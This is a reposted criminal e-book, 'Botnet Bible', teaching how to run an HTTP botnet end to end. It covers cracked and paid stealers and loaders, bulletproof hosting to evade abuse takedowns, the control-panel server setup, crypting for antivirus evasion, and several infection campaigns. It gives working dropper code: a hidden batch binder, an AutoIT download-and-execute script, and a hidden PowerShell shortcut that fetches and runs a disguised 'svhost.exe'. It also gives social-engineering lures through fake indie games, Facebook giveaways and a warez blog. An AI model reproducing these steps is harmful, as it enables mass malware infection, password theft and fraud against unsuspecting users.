Hướng dẫn tạo một botnet I Kinh thánh botnet

Kết quả hình ảnh cho botnet

Download PDF: Download file

BOTNET BIBLE
First of all thank you for buying my e-book, within this guide i will be
teaching you how to setup http botnet/controller. Everything is covered
step by step, but if you face any problem, dont hestitate to contact me.
Botnets types:
In this version of my ebook only http controllers are covered. Http botnets
we can divide into two types:
– loaders
– stealers
Loaders are usually used to hold bots, it can only perform
download&execute, update, unistall tasks.
Stealers are usually used to steal saved passwords from popular browsers,
email clients, ftp clients, chat logs from skype/jabber etc. Good stealer
should have keylogger.
WARNING!!!
Always run cracked builder using
virtual machine.
Free botnets you may use:
Botnet files i have included with this ebook:
– Betabot 1.8.0.11 – its a multi task and native bot, its old and cracked
builder so not all function are working. But this is still one of the best
choice to hold good amount of bots. This botnet has strong botkiller,
AV killer, persistence, few ddos methods, hosts file editor and much
more.
– Novobot – its just a loader coded in c++, hidden from task manager.
Cracked builder.
– Gaudox 1.0.0.1 – another free loader, released for free by excr4sh.
With good crypter its one of the best choices if you need to hold
good amount of bots.
– Loki 1.6 – its old version of popular stealer. Cracked builder 1.6
– OmegaNet – its simple multi-task botnet, based on litehttp(opensource).

– Diamondfox 4.2.0.650 Multi task botnet, builder is in virtual
machine.
Paid botnets you may use:
– smoke botnet
https://ift.tt/2vJRU4u
– quant loader
https://ift.tt/2M4ckAb
– Miner Bot
https://ift.tt/2vOwoLW
– Azourult |stealer
https://ift.tt/2M4bIdR
– Godzilla loader
https://ift.tt/2vOwpiY
– neutrino botnet
https://ift.tt/2M4cmbh
– formbook
https://ift.tt/2vOwrr6
Offshore servers and bulletproof domains:
Choosing the right hosting provider and domain registrar may save you a
lot of troubles in future. For small botnets (500-5000 bots) you may only
need to buy Virtual Private Server located in one of those countries:
– Panama
– Costa Rica
– Berize
– Guatemala
– Russia
few examples:
– panamaserver.com
– offshoreracks.com
– ccihosting.com
and russian or chaina registrar, few examples:
– r01.ru
– nic.ru
– tonic.tu
– openleaf.net.ru
Depends on your actions(how you spread your executable file, how you
use your botnet(ddosing, minning, herding bots, CPA,CEO, etc.) your
server or domain may be listed on spamhaus, it means your
domain/server/customer account may be suspended permanently. In this
case, when you create your botnet u use at least two back up domains, so if
your main domain will be suspended, your bots will connect to back up
domain. If your server get suspended you just need to reinstall your panel
on another server. From my experience some providers ignore first abuse
but if spamhaus will keep sending reports, you will get suspended. If u
want to avoid this problem, usually you need to buy good dedicated server
in offshore location, but its much expensive, also you may buy fast flux
system, its a proxy system, it hide your real server IP. You can only buy
Virtual Private Server, preferably Centos OS 6 or 7 and domains.
Setting up Virtual Private Server:
Once you purchase server you should get SSH, FTP, control panel details.
SSH access is used to control your OS and perform all commands, FTP is
used to transfer files between you and your VPS. Control panel is used to
reboot, reinstall server, statistics (i.e.bandwidth).
Download putty
https://ift.tt/2raJJxP
and login to SSH.
Centos 6:
1. First of all update your server and install wget and vim. Sometimes you may be
asked few times for confirmation, just press Y and ENTER:
Code:
sudo yum update
sudo yum install wget
sudo yum install vim
2. Install apache and run it:
Code:
sudo yum install httpd
sudo service httpd start
3. Install PHP. Sometimes newest version of PHP is required, in that case we will install
php and upgrade it using REMI and EPEL repositories:
– Install PHP:
Code:
sudo yum install php
– Install the Remi and EPEL RPM repositories:
Code:
wget https://ift.tt/1JkCDJ2
&& rpm -Uvh epel-release-latest-6.noarch.rpm
wget https://ift.tt/1fY6w3I && rpm -Uvh
remi-release-6*.rpm
– You need to enable the REMI repository globally. I will use VIM – free text editor. Quick
guide: if you press INSERT you will be able to edit document and if you press ESC you will
be in command mode. Type the following command:
Code:
vim /etc/yum.repos.d/remi.repo
Press INSTERT and under the section [remi] and [remi-php56] change the following line
from 0 to 1: enabled=0
Now press ESC and type the following command:
Code:
:wq
Now you can upgrade your php:
Code:
sudo yum -y upgrade php*
4. Install MYSQL server. We will use official REMI repositories.
Install and activate the REMI and EPEL RPM Repositories
If you have not done so already, install and activate the REMI and EPEL repositories;
Code:
wget https://ift.tt/1JkCDJ2 && rpm
-Uvh epel-release-latest-6.noarch.rpm
wget https://ift.tt/1fY6w3I && rpm -Uvh remirelease-6*.rpm
Install and activate mysql server:
Code:
sudo yum install mysql mysql-server
– now run mysql:
Code:
sudo service mysqld start
– using this commands you can upgrade and check what version of mysql you use:
Code:
yum -y update mysql*
rpm -qa | grep mysql
5. Install additional libraries. Few botnets require addidtional php libraries. For example
Zyklon HTTP require php-gd library for captcha. We will install few standard libraries:
Code:
sudo yum install php-mysql php-pdo php-common php-cli php-gd
6. Now we need to install Ioncube Loader. Download it
from https://ift.tt/1AfKGmD I use centos 6 64bit so i choosed linux 64 bit.
You can see a lot of files in archive, which Ioncube loader is the right one ? Depends on
your PHP version. Type the following command:
Code:
php -v
In that case i have installed PHP 5.6 so i copy the following file: ioncube_loader_lin_5.6 to
my server. You need to copy it to: /usr/lib64/php/modules/ioncube_loader_lin_5.6.so
Do it in ftp client if u want. Now you need to edit php.ini file. Its located in /etc/php.ini We
will use vim again:
Code:
vim /etc/php.ini
Press INSERT and add the following line at the top of the file. This is just path to Ioncube
loader. Version of Ioncube loader must match with PHP version.
Code:
zend_extension = /usr/lib64/php/modules/ioncube_loader_lin_5.6.so
Now restart apache&mysql and check if its installed correctly:
Code:
service httpd restart
service mysqld restart
php -v
7. Dealing with mysql:
– Run mysql installation script:
Code:
mysql_secure_installation
You will be able to setup new root password to your mysql. To other questions just answer
yes.
– Now log in to mysql:
Code:
mysql -u root -p
– Create new database:
Code:
create database NameOfYourDatabase;
– Create new user with privileges and refresh it:
Code:
CREATE USER ‘NameOfYourUser’@’localhost’ IDENTIFIED BY ‘PasswordForYourUser’;
GRANT ALL PRIVILEGES ON NameOfYourDatabase . * TO ‘NameOfYourUser’@’localhost’;
FLUSH PRIVILEGES;
Centos 7:
Installing MySQL / MariaDB
MariaDB is a MySQL fork of the original MySQL developer Monty Widenius. MariaDB is compatible with
MySQL and I’ve chosen to use MariaDB here instead of MySQL. To install MySQL, we do install MariaDB
like this:
yum -y install mariadb-server mariadb
Then we create the system startup links for MySQL (so that MySQL starts automatically whenever the
system boots) and start the MySQL server:
systemctl start mariadb.service
systemctl enable mariadb.service
Set passwords for the MySQL root account:
mysql_secure_installation
Just press enter and you will be able to setup new mysql root password.
3 Installing Apache2
CentOS 7 ships with apache 2.4. Apache2 is directly available as a CentOS 7.0 package, therefore we
can install it like this:
yum -y install httpd
By default apache will be installed, if-not then please install it as shown above
Now configure your system to start Apache at boot time…
systemctl start httpd.service
systemctl enable httpd.service
In CentOS 7.0 uses Firewall-cmd, so I will customize it to allow external access to port 80 (http)
and 443 (https).
firewall-cmd –permanent –zone=public –add-service=http
firewall-cmd –permanent –zone=public –add-service=https
firewall-cmd –reload
Now direct your browser to http://192.168.0.100, and you should see the Apache2 placeholder
page.
4 Installing PHP5
We can install PHP5 and the Apache PHP5 module as follows:
yum -y install php
We must restart Apache afterwards:
systemctl restart httpd.service
5 Testing PHP5 / Getting Details About Your PHP5
Installation
The document root of the default website is /var/www/html. We will now create a small PHP file
(info.php) in that directory and call it in a browser. The file will display lots of useful details about our
PHP installation, such as the installed PHP version.
vi /var/www/html/info.php
<?php
phpinfo();
?>
Now we call that file in a browser (e.g. https://ift.tt/2M4cnMn
As you see, PHP5 is working, and it’s working through the Apache 2.0 Handler, as shown in
the Server API line. If you scroll further down, you will see all modules that are already enabled in
PHP5. MySQL is not listed there which means we don’t have MySQL support in PHP5 yet.
6 Getting MySQL Support In PHP5
To get MySQL support in PHP, we can install the php-mysql package. It’s a good idea to install some
other PHP5 modules as well as you might need them for your applications. You can search for available
PHP5 modules like this:
yum search php
Pick the ones you need and install them like this:
yum -y install php-mysql
In the next step I will install some common PHP modules that are required by CMS Systems like
Wordpress, Joomla and Drupal:
yum -y install php-gd php-ldap php-odbc php-pear php-xml php-xmlrpc php-mbstring phpsnmp
php-soap curl curl-devel
Now restart Apache2:
systemctl restart httpd.service
Now reload https://ift.tt/1MtimzL in your browser and scroll down to the modules
section again. You should now find lots of new modules like curl etc there.:
Setting up domains:
Depends which server/domain you bought, you have two options:
– add A record(contains your VPS IP) to your domain if you
purchased DNS hosting within your domain
– add nameservers to your domain if you purchased DNS zone with
your server
For example if you choosed panamaserver and nic.ru domain you can just
add nameservers to your domain, because panamaserver provides you your
name servers: ns1.panamaserver.co and ns2.panamaserver.co
If u dont have nameservers you need to use A record.
Adding nameservers in nic.ru:
Adding your domain in panamserver DNS zone:
Dealing with botnet panel:
– Copy panel files to /var/www/html/YourDirectory/
– Go to yourdomain.xx/YourDirectory/setup.php or similar name.
You may use your server ip instead of domain name. Fill all fields,
similar to this:
Code:
sql host: localhost or 127.0.0.1
sql user: NameOfYourUser
database name: NameOfYourDatabase
panel admin login: YourLoginToPanel
panel admin pass: YourPassToPanel
connection key: Usually you can generate it in your builder
Crypting and dealing with builder/executable file:
– If you already got your executable file(you bought panel files
and executable file) you may miss this step. Usually in domains/ips
tab you add your domains/ips and in path you add
path(YourDirectory) to your gate. You should have example in
builder how to fill all fields correctly. If u face any problem, let me
know.
Now you need to crypt your file, if u have never used crypter you
should read this thread:
https://ift.tt/2M4coQr
Its good explanation how crypters works.
Spreading methods:
1.Geo-targeted Torrents Spreading: This method is known
everywhere, but i guess you never heard about how to target
specific countries. Go to https://ift.tt/2vJRZVQ and click
register(1*).
You should use chrome browser and autotranslate. This site is only
message board about p2p newtorks. Go to Open registration
thread(2*). You can find here public and private trackers from the
entire world. You will get the best results if you choose site in your
arterial language but you can still use chrome auto-translate.
You can find much more than this:
http://1337x.to
http://limetorrents.cc
https://ift.tt/1dhcM4R https://ift.tt/2oCUaWO
https://ift.tt/23ara4Z
https://ift.tt/1IMtmuP https://ift.tt/1fbnrmc
Important:
– 5-15 USD Buy Seedbox/Shell/RDP, you will be able to seed your
torrents 24/7. Windows RDP with 100-500gb will be enough for
you.
– 5-15 USD I suggest you to buy invite to private tracker. You
will have access to legitimate software. Im usually using
http://iptorrents.com. You can always find your software
somewhere else.
Now you have to find popular windows application and bind it with
your server. I will show you few methods how to do this. First you
have to use crypter to make it FUD. You will get the best results if
you buy private stub and if its runtime fud. Before you buy crypter i
suggest you to read The Crypter Bible by KillaMuvz
Binding:
– – You may use Ultimate Spreading Tool – Usually you can use
binder in your crypter but you have to make sure that you have
option „run once”. – I suggest you to use Exe to bat converter if
you are binding two executable files. Open notepad and type:
@echo off start server.exe TIMEOUT /T 10 start legit.exe
Save it as start.bat and add it in converter. In options choose
invisible application and/or current/temporary directory.
Include server.exe – your server and legit.exe – your program.
Compile your file and make new torrent in your RDP. Usually you
have to add trackers(3*) to it but its not necessary. You may just
google public trackers list 2016. First you should upload few legit
torrents movies/music or other. Dont upload duplicates and read
rules. If you will be banned just make new account.
Important:
– Use scantime FUD downloader instead of your encrypted
server. People will always download your fresh file. – You can use
Ultimate Spreading Tool or Neos Downloader or any other free
downloader. – You can make your downloader using AutoIT.
Download AutoIT here Create new AutoIT Script:
$downloadlink = “[DirectLinkToYourFile]”
$downloadhere = @Appdatadir & “\YourFile.exe”
Inetget($downloadlink, $downloadhere, 1,1)
Sleep(500)
shellexecute($downloadhere) examples: $downloadlink =
“[http://directlink.se/server.exe]” $downloadhere = @Appdatadir &
“\server.exe”
Now you can run converter and convert it to .exe
– – You can create .ink downloader. Right click in
destkop/create/shortcut and copy this code: powershell
-windowstyle hidden (new-object
System.Net.WebClient).DownloadFile(‘https://ift.tt/2vJS4ZE
ham/putty/latest/x86/putty.exe’,’%TEMP%\svhost.exe’);
StartProcess “%TEMP%\svhost.exe” Replace link to putty.exe with
your file. Warning: You cant bind .ink with other files. Investment –
You can always buy FUD downloader to get the best results while
spreading.
2. Spreading to gamers: This method do not require investment
and you will need only 15 minutes to setup everything. You just
need to register in one of those sites and pretend to be a young
game developer: http://itch.io/ http://www.indiedb.com/
http://gamejolt.com/ Make account and make your profile looks
more legit, add picture,description,something about you. Choose a
development status when you adding new game. Remember, the
better it looks, the more downloads you will get. Pump yoour file to
about 20-50 MB or add to archive some random DLL files, your
server/downloader and upload it. You shuould use „fake error”
option in your crypter. Then you can advertise your game in chat or
other places. Dont upload duplicates and read rules. If you will be
banned just make new account. You should find other inchie games
sites and repeat process. With this method you can easly get
hundred clients per day.
3. Facebook spreading.
STEP 1 make your file FUD and change the icon to a fidget spinner
or make it look like a form, next upload it to directlink.cz and or
safe.moe or anywhere you may choose.
STEP 2 The spreading, I mainly use Facebook for this but you can
use other socialmedia sites and or forums, but I have had the most
success using facebook you need to make a fake account that
promotes fidget spinners and upload and share the photo I
provided with a description like this:
“To win a free fidget spinner just click the link down bellow
download our form and you will soon receive a free sample fidget
spinner”
you can make this a bit more elaborate to make it more convincing
or if you already have access to FB accounts that you have
achieved from slaves you already have just log in and post this
same message and tag all the users friends and family members,
but most people will fall for it regardless and I know what you may
be thinking this method is ridiculous I was just as suprized as you
were once I tried it I had several hundred downloads after I
uploaded it to several facebook accounts item popularity is key
people see something booming on the net so they wan’t it, this
method is most effective on facebook accounts that already have
allot of real friends or family members, but the fake account
method works aswell you just need to share the photo and the link
with the description I provided on as many toy FB pages or popular
pages as possible and the results will begin to show. anyway this
method is coming to an end now, I hope you gain as much success
as I did with it and I hope you enjoy it, you can put your own twist
on it aswell and maybe incorporate different items, such as other
fidget toys or niches but regardless thanks for buying and good
luck!
4. Warez spreading
This is really old but still working method. So why did you pay this
tutorial? Because I’ll not just tell you some ideas. I’ll show you how
to do it with actual tools. I’m using this method for my silent miners
and so far 15-20 new downloads every day with autopilot. I’ve
spend only $11 dollar for this setup and every day 15-20 new install
is good numbers for me. Lets begin the tutorial. First of all we will
basically open a warez download blog. At least people will think
that way. You need to buy your hosting and domain anonymously
because of you will share some illegal things on this site and we
don’t want to leave any trace behind us.
For anonymous purchase and good service I choosed Namecheap
for this method. I paid $11 for SSL + Hosting + Whois Protection +
.store domain This will be total amount of our investment. Don’t
forget to pay with bitcoin. We are choosing Namecheap because
they let us paying with bitcoins. And complete the forms with fake
information ofcourse. After we setup our site we won’t even login
again so do everything carefully 🙂 Ok we bought our hosting and
domain and we are ready to go. Login your cpanel and setup your
wordpress automatically. Find a good, seo friendly and lightweight
theme for your wp and install it. Go to Plugins and click the add
new. Search for wp-o-matic This tool is a lifesaver. Install and
activate it. Wp-o-matic is a content robot. It’s fetching contents
from the rss feeds periodically. Yes this content is not original, yes it
is bad for seo but we are not aiming high ranks on the google
either. C/P content will do don’t worry. Go to Wp-o-matic and click
add new campaign.
This section is customizable but you should follow and copy my
settings. Add New Campaign You can give a name for your
campaign like KeyGens. We can collect all keygen rss’s under this
campaign. Widget After Content I’ll get this later. No need to touch
it. Campaign Description You can leave blank this section. Feeds For
This Campaign This is an important part. You should go to google
and find some quality warez blogs. I checked google and find one
and it has rss feeds too 🙂 https://ift.tt/2M4bRxV Click the add
feed button and paste your feed url. Then click the Check all feeds
button. If this feed is suitable it turns green. If it is not suitable it
will shown red. Delete the red ones and add the new rss’es. 4 5
quality rss feed will do. It means at least 4 5 new post to your site.
Publish You don’t need to change anything in here. And we are not
ready to publish either. Wait for other settings. Campaign Post
Formats This section is irrelevant too. No need to change anything
here.
Options for this campaign If you are not know what are you doing
just copy my settings in here. We are getting contents and
removing original download links from it here. We will add our
download links later. Schedule Cron You will schedule your
campaign so everyday at 3 o’clock your bot will add new contents.
Campaign Categories You can check add auto categories and you
don’t need to do it manually later. Don’t change anything more at
your page.
Click publish and wait. When the Run Now button available click it.
And wait your bot is fetching new contents. Now you have a warez
blog which is creating automatic content everyday. Congratz. You
can add your advertisement codes and start earning little from it.
But stop we are not after advertisement earnings. Lets move on.
Now go to plugin page again and click add new. Search for Widget
After Content. Install it then activate it. This plugin creates custom
contents automatically after every one of your posts. We will add
our download links with this plugin
Did you see, there is a after content block. Drop down there a text
widget and open it
Add your download links and click save. You will put your own stubs
download links don’t forget. And you can rename your mallware like
Ultimate Downloader, Sourceforge Downloader and you are ready
to go. You have an auto-pilot slave factory congratz.
This is my one week download numbers. Isn’t it bad huh?



from Trương Định https://ift.tt/2vOwEuo
via IFTTT